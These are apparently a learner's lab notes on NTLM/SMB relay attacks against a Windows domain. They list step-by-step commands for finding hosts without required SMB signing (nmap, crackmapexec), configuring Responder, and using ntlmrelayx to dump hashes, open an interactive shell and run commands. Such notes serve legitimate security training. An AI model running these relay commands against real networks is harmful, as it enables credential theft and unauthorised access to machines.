Instead of cracking, PASS/RELAY it to gain access!
By default:
SMB signing is disabled on user accounts
SMB signing is enabled on server accounts
Identify Hosts without SMB Signing:
nmap --script=smb2-security-mode.nse -p445 192.168.218.136 -Pn-Pn checks host anyway
adjusting Responder:
sudo mousepad /etc/responder/Responder.confswitch SMB and HTTP to Off
then run responder
Scanning Domain Controller:
Message signing enabled and REQUIRED. Can’t do it.
Scanning one of the computers:
Message signing enabled but NOT REQUIRED. What we want.
You can run it on everything and catch back the ones that are not by using grep:
nmap --script=smb2-security-mode.nse -p445 192.168.218.0/24 -Pn | grep not -A 2DISCORD TIP: USE CME
cme smb 192.168.218.0/24 --gen-relay-list relay.list
Note: SPIDERMAN was offline that's why it wasn’t found!
relay.list can be used with ntlmrelayx
ntlmrelayx.py -tf relay.list -smb2support-tf is target file. Could be relay.list or it could be targets.txt if we did it the nmap way!
Hashes dumped:
to use interactive mode:
ntlmrelayx.py -tf relay.list -smb2support -iand listen to it with:
nc 127.0.0.1 11000you can type help to find commands!
ntlmrelayx.py -tf relay.list -smb2support -c "whoami"